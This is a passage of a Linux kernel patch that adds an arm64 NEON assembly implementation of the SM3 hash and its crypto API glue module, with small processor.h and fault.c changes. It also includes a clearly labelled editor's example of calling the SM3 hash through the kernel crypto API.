++	add	addr1, sp, #IW_W1_ADDR(4, 0);
++#define LOAD_W_VEC_1_3() \
++	ld1	{W0.16b}, [RDATA], #16;
++#define LOAD_W_VEC_1_4() \
++	ld1	{W1.16b}, [RDATA], #16;
++#define LOAD_W_VEC_1_5() \
++	ld1	{W2.16b}, [RDATA], #16;
++#define LOAD_W_VEC_1_6() \
++	ld1	{W3.16b}, [RDATA], #16;
++#define LOAD_W_VEC_1_7() \
++	rev32	XTMP0.16b, W0.16b;
++#define LOAD_W_VEC_1_8() \
++	rev32	XTMP1.16b, W1.16b;
++#define LOAD_W_VEC_2_1() \
++	rev32	XTMP2.16b, W2.16b;
++#define LOAD_W_VEC_2_2() \
++	rev32	XTMP3.16b, W3.16b;
++#define LOAD_W_VEC_2_3() \
++	eor	XTMP4.16b, XTMP1.16b, XTMP0.16b;
++#define LOAD_W_VEC_2_4() \
++	eor	XTMP5.16b, XTMP2.16b, XTMP1.16b;
++#define LOAD_W_VEC_2_5() \
++	st1	{XTMP0.16b}, [addr0], #16;
++#define LOAD_W_VEC_2_6() \
++	st1	{XTMP4.16b}, [addr0]; \
++	add	addr0, sp, #IW_W1_ADDR(8, 0);
++#define LOAD_W_VEC_2_7() \
++	eor	XTMP6.16b, XTMP3.16b, XTMP2.16b;
++#define LOAD_W_VEC_2_8() \
++	ext	W0.16b, XTMP0.16b, XTMP0.16b, #8;  /* W0: xx, w0, xx, xx */
++#define LOAD_W_VEC_3_1() \
++	mov	W2.16b, XTMP1.16b;                 /* W2: xx, w6, w5, w4 */
++#define LOAD_W_VEC_3_2() \
++	st1	{XTMP1.16b}, [addr1], #16;
++#define LOAD_W_VEC_3_3() \
++	st1	{XTMP5.16b}, [addr1]; \
++	ext	W1.16b, XTMP0.16b, XTMP0.16b, #4;  /* W1: xx, w3, w2, w1 */
++#define LOAD_W_VEC_3_4() \
++	ext	W3.16b, XTMP1.16b, XTMP2.16b, #12; /* W3: xx, w9, w8, w7 */
++#define LOAD_W_VEC_3_5() \
++	ext	W4.16b, XTMP2.16b, XTMP3.16b, #8;  /* W4: xx, w12, w11, w10 */
++#define LOAD_W_VEC_3_6() \
++	st1	{XTMP2.16b}, [addr0], #16;
++#define LOAD_W_VEC_3_7() \
++	st1	{XTMP6.16b}, [addr0];
++#define LOAD_W_VEC_3_8() \
++	ext	W5.16b, XTMP3.16b, XTMP3.16b, #4;  /* W5: xx, w15, w14, w13 */
++
++#define LOAD_W_VEC_1(iop_num, ...) \
++	LOAD_W_VEC_1_##iop_num()
++#define LOAD_W_VEC_2(iop_num, ...) \
++	LOAD_W_VEC_2_##iop_num()
++#define LOAD_W_VEC_3(iop_num, ...) \
++	LOAD_W_VEC_3_##iop_num()
++
++/* Message scheduling. Note: 3 words per vector register.
++ * Interleaving within round function needed for in-order CPUs. */
++#define SCHED_W_1_1(round, w0, w1, w2, w3, w4, w5) \
++	/* Load (w[i - 16]) => XTMP0 */            \
++	/* Load (w[i - 13]) => XTMP5 */            \
++	ext	XTMP0.16b, w0.16b, w0.16b, #12;    /* XTMP0: w0, xx, xx, xx */
++#define SCHED_W_1_2(round, w0, w1, w2, w3, w4, w5) \
++	ext	XTMP5.16b, w1.16b, w1.16b, #12;
++#define SCHED_W_1_3(round, w0, w1, w2, w3, w4, w5) \
++	ext	XTMP0.16b, XTMP0.16b, w1.16b, #12; /* XTMP0: xx, w2, w1, w0 */
++#define SCHED_W_1_4(round, w0, w1, w2, w3, w4, w5) \
++	ext	XTMP5.16b, XTMP5.16b, w2.16b, #12;
++#define SCHED_W_1_5(round, w0, w1, w2, w3, w4, w5) \
++	/* w[i - 9] == w3 */                       \
++	/* W3 ^ XTMP0 => XTMP0 */                  \
++	eor	XTMP0.16b, XTMP0.16b, w3.16b;
++#define SCHED_W_1_6(round, w0, w1, w2, w3, w4, w5) \
++	/* w[i - 3] == w5 */                       \
++	/* rol(w5, 15) ^ XTMP0 => XTMP0 */         \
++	/* rol(XTMP5, 7) => XTMP1 */               \
++	add	addr0, sp, #XW_W1_ADDR((round), 0); \
++	shl	XTMP2.4s, w5.4s, #15;
++#define SCHED_W_1_7(round, w0, w1, w2, w3, w4, w5) \
++	shl	XTMP1.4s, XTMP5.4s, #7;
++#define SCHED_W_1_8(round, w0, w1, w2, w3, w4, w5) \
++	sri	XTMP2.4s, w5.4s, #(32-15);
++#define SCHED_W_2_1(round, w0, w1, w2, w3, w4, w5) \
++	sri	XTMP1.4s, XTMP5.4s, #(32-7);
++#define SCHED_W_2_2(round, w0, w1, w2, w3, w4, w5) \
++	eor	XTMP0.16b, XTMP0.16b, XTMP2.16b;
++#define SCHED_W_2_3(round, w0, w1, w2, w3, w4, w5) \
++	/* w[i - 6] == W4 */                       \
++	/* W4 ^ XTMP1 => XTMP1 */                  \
++	eor	XTMP1.16b, XTMP1.16b, w4.16b;
++#define SCHED_W_2_4(round, w0, w1, w2, w3, w4, w5) \
++	/* P1(XTMP0) ^ XTMP1 => W0 */              \
++	shl	XTMP3.4s, XTMP0.4s, #15;
++#define SCHED_W_2_5(round, w0, w1, w2, w3, w4, w5) \
++	shl	XTMP4.4s, XTMP0.4s, #23;
++#define SCHED_W_2_6(round, w0, w1, w2, w3, w4, w5) \
++	eor	w0.16b, XTMP1.16b, XTMP0.16b;
++#define SCHED_W_2_7(round, w0, w1, w2, w3, w4, w5) \
++	sri	XTMP3.4s, XTMP0.4s, #(32-15);
++#define SCHED_W_2_8(round, w0, w1, w2, w3, w4, w5) \
++	sri	XTMP4.4s, XTMP0.4s, #(32-23);
++#define SCHED_W_3_1(round, w0, w1, w2, w3, w4, w5) \
++	eor	w0.16b, w0.16b, XTMP3.16b;
++#define SCHED_W_3_2(round, w0, w1, w2, w3, w4, w5) \
++	/* Load (w[i - 3]) => XTMP2 */             \
++	ext	XTMP2.16b, w4.16b, w4.16b, #12;
++#define SCHED_W_3_3(round, w0, w1, w2, w3, w4, w5) \
++	eor	w0.16b, w0.16b, XTMP4.16b;
++#define SCHED_W_3_4(round, w0, w1, w2, w3, w4, w5) \
++	ext	XTMP2.16b, XTMP2.16b, w5.16b, #12;
++#define SCHED_W_3_5(round, w0, w1, w2, w3, w4, w5) \
++	/* W1 ^ W2 => XTMP3 */                     \
++	eor	XTMP3.16b, XTMP2.16b, w0.16b;
++#define SCHED_W_3_6(round, w0, w1, w2, w3, w4, w5)
++#define SCHED_W_3_7(round, w0, w1, w2, w3, w4, w5) \
++	st1	{XTMP2.16b-XTMP3.16b}, [addr0];
++#define SCHED_W_3_8(round, w0, w1, w2, w3, w4, w5)
++
++#define SCHED_W_W0W1W2W3W4W5_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W0, W1, W2, W3, W4, W5)
++#define SCHED_W_W0W1W2W3W4W5_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W0, W1, W2, W3, W4, W5)
++#define SCHED_W_W0W1W2W3W4W5_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W0, W1, W2, W3, W4, W5)
++
++#define SCHED_W_W1W2W3W4W5W0_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W1, W2, W3, W4, W5, W0)
++#define SCHED_W_W1W2W3W4W5W0_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W1, W2, W3, W4, W5, W0)
++#define SCHED_W_W1W2W3W4W5W0_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W1, W2, W3, W4, W5, W0)
++
++#define SCHED_W_W2W3W4W5W0W1_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W2, W3, W4, W5, W0, W1)
++#define SCHED_W_W2W3W4W5W0W1_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W2, W3, W4, W5, W0, W1)
++#define SCHED_W_W2W3W4W5W0W1_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W2, W3, W4, W5, W0, W1)
++
++#define SCHED_W_W3W4W5W0W1W2_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W3, W4, W5, W0, W1, W2)
++#define SCHED_W_W3W4W5W0W1W2_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W3, W4, W5, W0, W1, W2)
++#define SCHED_W_W3W4W5W0W1W2_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W3, W4, W5, W0, W1, W2)
++
++#define SCHED_W_W4W5W0W1W2W3_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W4, W5, W0, W1, W2, W3)
++#define SCHED_W_W4W5W0W1W2W3_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W4, W5, W0, W1, W2, W3)
++#define SCHED_W_W4W5W0W1W2W3_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W4, W5, W0, W1, W2, W3)
++
++#define SCHED_W_W5W0W1W2W3W4_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W5, W0, W1, W2, W3, W4)
++#define SCHED_W_W5W0W1W2W3W4_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W5, W0, W1, W2, W3, W4)
++#define SCHED_W_W5W0W1W2W3W4_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W5, W0, W1, W2, W3, W4)
++
++
++	/*
++	 * Transform blocks*64 bytes (blocks*16 32-bit words) at 'src'.
++	 *
++	 * void sm3_neon_transform(struct sm3_state *sst, u8 const *src,
++	 *                         int blocks)
++	 */
++	.text
++.align 3
++SYM_TYPED_FUNC_START(sm3_neon_transform)
++	ldp		ra, rb, [RSTATE, #0]
++	ldp		rc, rd, [RSTATE, #8]
++	ldp		re, rf, [RSTATE, #16]
++	ldp		rg, rh, [RSTATE, #24]
++
++	stp		x28, x29, [sp, #-16]!
++	stp		x19, x20, [sp, #-16]!
++	stp		x21, x22, [sp, #-16]!
++	stp		x23, x24, [sp, #-16]!
++	stp		x25, x26, [sp, #-16]!
++	mov		RFRAME, sp
++
++	sub		addr0, sp, #STACK_SIZE
++	adr_l		RKPTR, .LKtable
++	and		sp, addr0, #(~63)
++
++	/* Preload first block. */
++	LOAD_W_VEC_1(1, 0)
++	LOAD_W_VEC_1(2, 0)
++	LOAD_W_VEC_1(3, 0)
++	LOAD_W_VEC_1(4, 0)
++	LOAD_W_VEC_1(5, 0)
++	LOAD_W_VEC_1(6, 0)
++	LOAD_W_VEC_1(7, 0)
++	LOAD_W_VEC_1(8, 0)
++	LOAD_W_VEC_2(1, 0)
++	LOAD_W_VEC_2(2, 0)
++	LOAD_W_VEC_2(3, 0)
++	LOAD_W_VEC_2(4, 0)
++	LOAD_W_VEC_2(5, 0)
++	LOAD_W_VEC_2(6, 0)
++	LOAD_W_VEC_2(7, 0)
++	LOAD_W_VEC_2(8, 0)
++	LOAD_W_VEC_3(1, 0)
++	LOAD_W_VEC_3(2, 0)
++	LOAD_W_VEC_3(3, 0)
++	LOAD_W_VEC_3(4, 0)
++	LOAD_W_VEC_3(5, 0)
++	LOAD_W_VEC_3(6, 0)
++	LOAD_W_VEC_3(7, 0)
++	LOAD_W_VEC_3(8, 0)
++
++.balign 16
++.Loop:
++	/* Transform 0-3 */
++	R1(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 0, 0, IW, _, 0)
++	R1(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  1, 1, IW, _, 0)
++	R1(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 2, 2, IW, _, 0)
++	R1(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  3, 3, IW, _, 0)
++
++	/* Transform 4-7 + Precalc 12-14 */
++	R1(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 4, 0, IW, _, 0)
++	R1(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  5, 1, IW, _, 0)
++	R1(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 6, 2, IW, SCHED_W_W0W1W2W3W4W5_1, 12)
++	R1(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  7, 3, IW, SCHED_W_W0W1W2W3W4W5_2, 12)
++
++	/* Transform 8-11 + Precalc 12-17 */
++	R1(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 8, 0, IW, SCHED_W_W0W1W2W3W4W5_3, 12)
++	R1(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  9, 1, IW, SCHED_W_W1W2W3W4W5W0_1, 15)
++	R1(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 10, 2, IW, SCHED_W_W1W2W3W4W5W0_2, 15)
++	R1(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  11, 3, IW, SCHED_W_W1W2W3W4W5W0_3, 15)
++
++	/* Transform 12-14 + Precalc 18-20 */
++	R1(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 12, 0, XW, SCHED_W_W2W3W4W5W0W1_1, 18)
++	R1(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  13, 1, XW, SCHED_W_W2W3W4W5W0W1_2, 18)
++	R1(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 14, 2, XW, SCHED_W_W2W3W4W5W0W1_3, 18)
++
++	/* Transform 15-17 + Precalc 21-23 */
++	R1(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  15, 0, XW, SCHED_W_W3W4W5W0W1W2_1, 21)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 16, 1, XW, SCHED_W_W3W4W5W0W1W2_2, 21)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  17, 2, XW, SCHED_W_W3W4W5W0W1W2_3, 21)
++
++	/* Transform 18-20 + Precalc 24-26 */
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 18, 0, XW, SCHED_W_W4W5W0W1W2W3_1, 24)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  19, 1, XW, SCHED_W_W4W5W0W1W2W3_2, 24)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 20, 2, XW, SCHED_W_W4W5W0W1W2W3_3, 24)
++
++	/* Transform 21-23 + Precalc 27-29 */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  21, 0, XW, SCHED_W_W5W0W1W2W3W4_1, 27)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 22, 1, XW, SCHED_W_W5W0W1W2W3W4_2, 27)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  23, 2, XW, SCHED_W_W5W0W1W2W3W4_3, 27)
++
++	/* Transform 24-26 + Precalc 30-32 */
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 24, 0, XW, SCHED_W_W0W1W2W3W4W5_1, 30)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  25, 1, XW, SCHED_W_W0W1W2W3W4W5_2, 30)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 26, 2, XW, SCHED_W_W0W1W2W3W4W5_3, 30)
++
++	/* Transform 27-29 + Precalc 33-35 */
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  27, 0, XW, SCHED_W_W1W2W3W4W5W0_1, 33)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 28, 1, XW, SCHED_W_W1W2W3W4W5W0_2, 33)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  29, 2, XW, SCHED_W_W1W2W3W4W5W0_3, 33)
++
++	/* Transform 30-32 + Precalc 36-38 */
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 30, 0, XW, SCHED_W_W2W3W4W5W0W1_1, 36)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  31, 1, XW, SCHED_W_W2W3W4W5W0W1_2, 36)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 32, 2, XW, SCHED_W_W2W3W4W5W0W1_3, 36)
++
++	/* Transform 33-35 + Precalc 39-41 */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  33, 0, XW, SCHED_W_W3W4W5W0W1W2_1, 39)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 34, 1, XW, SCHED_W_W3W4W5W0W1W2_2, 39)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  35, 2, XW, SCHED_W_W3W4W5W0W1W2_3, 39)
++
++	/* Transform 36-38 + Precalc 42-44 */
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 36, 0, XW, SCHED_W_W4W5W0W1W2W3_1, 42)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  37, 1, XW, SCHED_W_W4W5W0W1W2W3_2, 42)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 38, 2, XW, SCHED_W_W4W5W0W1W2W3_3, 42)
++
++	/* Transform 39-41 + Precalc 45-47 */
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  39, 0, XW, SCHED_W_W5W0W1W2W3W4_1, 45)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 40, 1, XW, SCHED_W_W5W0W1W2W3W4_2, 45)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  41, 2, XW, SCHED_W_W5W0W1W2W3W4_3, 45)
++
++	/* Transform 42-44 + Precalc 48-50 */
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 42, 0, XW, SCHED_W_W0W1W2W3W4W5_1, 48)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  43, 1, XW, SCHED_W_W0W1W2W3W4W5_2, 48)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 44, 2, XW, SCHED_W_W0W1W2W3W4W5_3, 48)
++
++	/* Transform 45-47 + Precalc 51-53 */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  45, 0, XW, SCHED_W_W1W2W3W4W5W0_1, 51)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 46, 1, XW, SCHED_W_W1W2W3W4W5W0_2, 51)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  47, 2, XW, SCHED_W_W1W2W3W4W5W0_3, 51)
++
++	/* Transform 48-50 + Precalc 54-56 */
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 48, 0, XW, SCHED_W_W2W3W4W5W0W1_1, 54)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  49, 1, XW, SCHED_W_W2W3W4W5W0W1_2, 54)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 50, 2, XW, SCHED_W_W2W3W4W5W0W1_3, 54)
++
++	/* Transform 51-53 + Precalc 57-59 */
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  51, 0, XW, SCHED_W_W3W4W5W0W1W2_1, 57)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 52, 1, XW, SCHED_W_W3W4W5W0W1W2_2, 57)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  53, 2, XW, SCHED_W_W3W4W5W0W1W2_3, 57)
++
++	/* Transform 54-56 + Precalc 60-62 */
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 54, 0, XW, SCHED_W_W4W5W0W1W2W3_1, 60)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  55, 1, XW, SCHED_W_W4W5W0W1W2W3_2, 60)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 56, 2, XW, SCHED_W_W4W5W0W1W2W3_3, 60)
++
++	/* Transform 57-59 + Precalc 63 */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  57, 0, XW, SCHED_W_W5W0W1W2W3W4_1, 63)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 58, 1, XW, SCHED_W_W5W0W1W2W3W4_2, 63)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  59, 2, XW, SCHED_W_W5W0W1W2W3W4_3, 63)
++
++	/* Transform 60 */
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 60, 0, XW, _, _)
++	subs		RNBLKS, RNBLKS, #1
++	b.eq		.Lend
++
++	/* Transform 61-63 + Preload next block */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  61, 1, XW, LOAD_W_VEC_1, _)
++	ldp		s0, s1, [RSTATE, #0]
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 62, 2, XW, LOAD_W_VEC_2, _)
++	ldp		s2, s3, [RSTATE, #8]
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  63, 0, XW, LOAD_W_VEC_3, _)
++
++	/* Update the chaining variables. */
++	eor		ra, ra, s0
++	eor		rb, rb, s1
++	ldp		s0, s1, [RSTATE, #16]
++	eor		rc, rc, s2
++	ldp		k_even, k_odd, [RSTATE, #24]
++	eor		rd, rd, s3
++	eor		re, re, s0
++	stp		ra, rb, [RSTATE, #0]
++	eor		rf, rf, s1
++	stp		rc, rd, [RSTATE, #8]
++	eor		rg, rg, k_even
++	stp		re, rf, [RSTATE, #16]
++	eor		rh, rh, k_odd
++	stp		rg, rh, [RSTATE, #24]
++	b		.Loop
++
++.Lend:
++	/* Transform 61-63 */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  61, 1, XW, _, _)
++	ldp		s0, s1, [RSTATE, #0]
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 62, 2, XW, _, _)
++	ldp		s2, s3, [RSTATE, #8]
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  63, 0, XW, _, _)
++
++	/* Update the chaining variables. */
++	eor		ra, ra, s0
++	clear_vec(W0)
++	eor		rb, rb, s1
++	clear_vec(W1)
++	ldp		s0, s1, [RSTATE, #16]
++	clear_vec(W2)
++	eor		rc, rc, s2
++	clear_vec(W3)
++	ldp		k_even, k_odd, [RSTATE, #24]
++	clear_vec(W4)
++	eor		rd, rd, s3
++	clear_vec(W5)
++	eor		re, re, s0
++	clear_vec(XTMP0)
++	stp		ra, rb, [RSTATE, #0]
++	clear_vec(XTMP1)
++	eor		rf, rf, s1
++	clear_vec(XTMP2)
++	stp		rc, rd, [RSTATE, #8]
++	clear_vec(XTMP3)
++	eor		rg, rg, k_even
++	clear_vec(XTMP4)
++	stp		re, rf, [RSTATE, #16]
++	clear_vec(XTMP5)
++	eor		rh, rh, k_odd
++	clear_vec(XTMP6)
++	stp		rg, rh, [RSTATE, #24]
++
++	/* Clear message expansion area */
++	add		addr0, sp, #STACK_W
++	st1		{W0.16b-W3.16b}, [addr0], #64
++	st1		{W0.16b-W3.16b}, [addr0], #64
++	st1		{W0.16b-W3.16b}, [addr0]
++
++	mov		sp, RFRAME
++
++	ldp		x25, x26, [sp], #16
++	ldp		x23, x24, [sp], #16
++	ldp		x21, x22, [sp], #16
++	ldp		x19, x20, [sp], #16
++	ldp		x28, x29, [sp], #16
++
++	ret
++SYM_FUNC_END(sm3_neon_transform)
++
++
++	.section	".rodata", "a"
++
++	.align 4
++.LKtable:
++	.long 0x79cc4519, 0xf3988a32, 0xe7311465, 0xce6228cb
++	.long 0x9cc45197, 0x3988a32f, 0x7311465e, 0xe6228cbc
++	.long 0xcc451979, 0x988a32f3, 0x311465e7, 0x6228cbce
++	.long 0xc451979c, 0x88a32f39, 0x11465e73, 0x228cbce6
++	.long 0x9d8a7a87, 0x3b14f50f, 0x7629ea1e, 0xec53d43c
++	.long 0xd8a7a879, 0xb14f50f3, 0x629ea1e7, 0xc53d43ce
++	.long 0x8a7a879d, 0x14f50f3b, 0x29ea1e76, 0x53d43cec
++	.long 0xa7a879d8, 0x4f50f3b1, 0x9ea1e762, 0x3d43cec5
++	.long 0x7a879d8a, 0xf50f3b14, 0xea1e7629, 0xd43cec53
++	.long 0xa879d8a7, 0x50f3b14f, 0xa1e7629e, 0x43cec53d
++	.long 0x879d8a7a, 0x0f3b14f5, 0x1e7629ea, 0x3cec53d4
++	.long 0x79d8a7a8, 0xf3b14f50, 0xe7629ea1, 0xcec53d43
++	.long 0x9d8a7a87, 0x3b14f50f, 0x7629ea1e, 0xec53d43c
++	.long 0xd8a7a879, 0xb14f50f3, 0x629ea1e7, 0xc53d43ce
++	.long 0x8a7a879d, 0x14f50f3b, 0x29ea1e76, 0x53d43cec
++	.long 0xa7a879d8, 0x4f50f3b1, 0x9ea1e762, 0x3d43cec5
+diff --git a/arch/arm64/crypto/sm3-neon-glue.c b/arch/arm64/crypto/sm3-neon-glue.c
+new file mode 100644
+index 0000000000000..7182ee683f14a
+--- /dev/null
++++ b/arch/arm64/crypto/sm3-neon-glue.c
+@@ -0,0 +1,103 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * sm3-neon-glue.c - SM3 secure hash using NEON instructions
++ *
++ * Copyright (C) 2022 Tianjia Zhang <tianjia.zhang@linux.alibaba.com>
++ */
++
++#include <asm/neon.h>
++#include <asm/simd.h>
++#include <asm/unaligned.h>
++#include <crypto/internal/hash.h>
++#include <crypto/internal/simd.h>
++#include <crypto/sm3.h>
++#include <crypto/sm3_base.h>
++#include <linux/cpufeature.h>
++#include <linux/crypto.h>
++#include <linux/module.h>
++
++
++asmlinkage void sm3_neon_transform(struct sm3_state *sst, u8 const *src,
++				   int blocks);
++
++static int sm3_neon_update(struct shash_desc *desc, const u8 *data,
++			   unsigned int len)
++{
++	if (!crypto_simd_usable()) {
++		sm3_update(shash_desc_ctx(desc), data, len);
++		return 0;
++	}
++
++	kernel_neon_begin();
++	sm3_base_do_update(desc, data, len, sm3_neon_transform);
++	kernel_neon_end();
++
++	return 0;
++}
++
++static int sm3_neon_final(struct shash_desc *desc, u8 *out)
++{
++	if (!crypto_simd_usable()) {
++		sm3_final(shash_desc_ctx(desc), out);
++		return 0;
++	}
++
++	kernel_neon_begin();
++	sm3_base_do_finalize(desc, sm3_neon_transform);
++	kernel_neon_end();
++
++	return sm3_base_finish(desc, out);
++}
++
++static int sm3_neon_finup(struct shash_desc *desc, const u8 *data,
++			  unsigned int len, u8 *out)
++{
++	if (!crypto_simd_usable()) {
++		struct sm3_state *sctx = shash_desc_ctx(desc);
++
++		if (len)
++			sm3_update(sctx, data, len);
++		sm3_final(sctx, out);
++		return 0;
++	}
++
++	kernel_neon_begin();
++	if (len)
++		sm3_base_do_update(desc, data, len, sm3_neon_transform);
++	sm3_base_do_finalize(desc, sm3_neon_transform);
++	kernel_neon_end();
++
++	return sm3_base_finish(desc, out);
++}
++
++static struct shash_alg sm3_alg = {
++	.digestsize		= SM3_DIGEST_SIZE,
++	.init			= sm3_base_init,
++	.update			= sm3_neon_update,
++	.final			= sm3_neon_final,
++	.finup			= sm3_neon_finup,
++	.descsize		= sizeof(struct sm3_state),
++	.base.cra_name		= "sm3",
++	.base.cra_driver_name	= "sm3-neon",
++	.base.cra_blocksize	= SM3_BLOCK_SIZE,
++	.base.cra_module	= THIS_MODULE,
++	.base.cra_priority	= 200,
++};
++
++static int __init sm3_neon_init(void)
++{
++	return crypto_register_shash(&sm3_alg);
++}
++
++static void __exit sm3_neon_fini(void)
++{
++	crypto_unregister_shash(&sm3_alg);
++}
++
++module_init(sm3_neon_init);
++module_exit(sm3_neon_fini);
++
++MODULE_DESCRIPTION("SM3 secure hash using NEON instructions");
++MODULE_AUTHOR("Jussi Kivilinna <jussi.kivilinna@iki.fi>");
++MODULE_AUTHOR("Tianjia Zhang <tianjia.zhang@linux.alibaba.com>");
++MODULE_LICENSE("GPL v2");
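/*
 * [Editor's sketch, not part of the patch] Once CONFIG_CRYPTO_SM3_NEON is
 * enabled and the shash above is registered, any kernel caller can reach
 * it through the generic crypto API; its cra_priority of 200 should make
 * it win over the generic C implementation when "sm3" is requested. A
 * minimal, hypothetical caller (the name sm3_digest_example and its use
 * are illustrative only):
 */
#include <crypto/hash.h>
#include <crypto/sm3.h>
#include <linux/err.h>

static int sm3_digest_example(const u8 *data, unsigned int len,
			      u8 out[SM3_DIGEST_SIZE])
{
	struct crypto_shash *tfm;
	int ret;

	/* Selects the highest-priority registered "sm3" implementation. */
	tfm = crypto_alloc_shash("sm3", 0, 0);
	if (IS_ERR(tfm))
		return PTR_ERR(tfm);

	ret = crypto_shash_tfm_digest(tfm, data, len, out);
	crypto_free_shash(tfm);
	return ret;
}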
+diff --git a/arch/arm64/include/asm/processor.h b/arch/arm64/include/asm/processor.h
+index 445aa3af3b762..400f8956328b9 100644
+--- a/arch/arm64/include/asm/processor.h
++++ b/arch/arm64/include/asm/processor.h
+@@ -308,13 +308,13 @@ static inline void compat_start_thread(struct pt_regs *regs, unsigned long pc,
+ }
+ #endif
+ 
+-static inline bool is_ttbr0_addr(unsigned long addr)
++static __always_inline bool is_ttbr0_addr(unsigned long addr)
+ {
+ 	/* entry assembly clears tags for TTBR0 addrs */
+ 	return addr < TASK_SIZE;
+ }
+ 
+-static inline bool is_ttbr1_addr(unsigned long addr)
++static __always_inline bool is_ttbr1_addr(unsigned long addr)
+ {
+ 	/* TTBR1 addresses may have a tag if KASAN_SW_TAGS is in use */
+ 	return arch_kasan_reset_tag(addr) >= PAGE_OFFSET;
+diff --git a/arch/arm64/mm/fault.c b/arch/arm64/mm/fault.c
+index 5b391490e045b..74f76514a48d0 100644
+--- a/arch/arm64/mm/fault.c
++++ b/arch/arm64/mm/fault.c
+@@ -353,6 +353,11 @@ static bool is_el1_mte_sync_tag_check_fault(unsigned long esr)
+ 	return false;
+ }
+ 
++static bool is_translation_fault(unsigned long esr)
++{
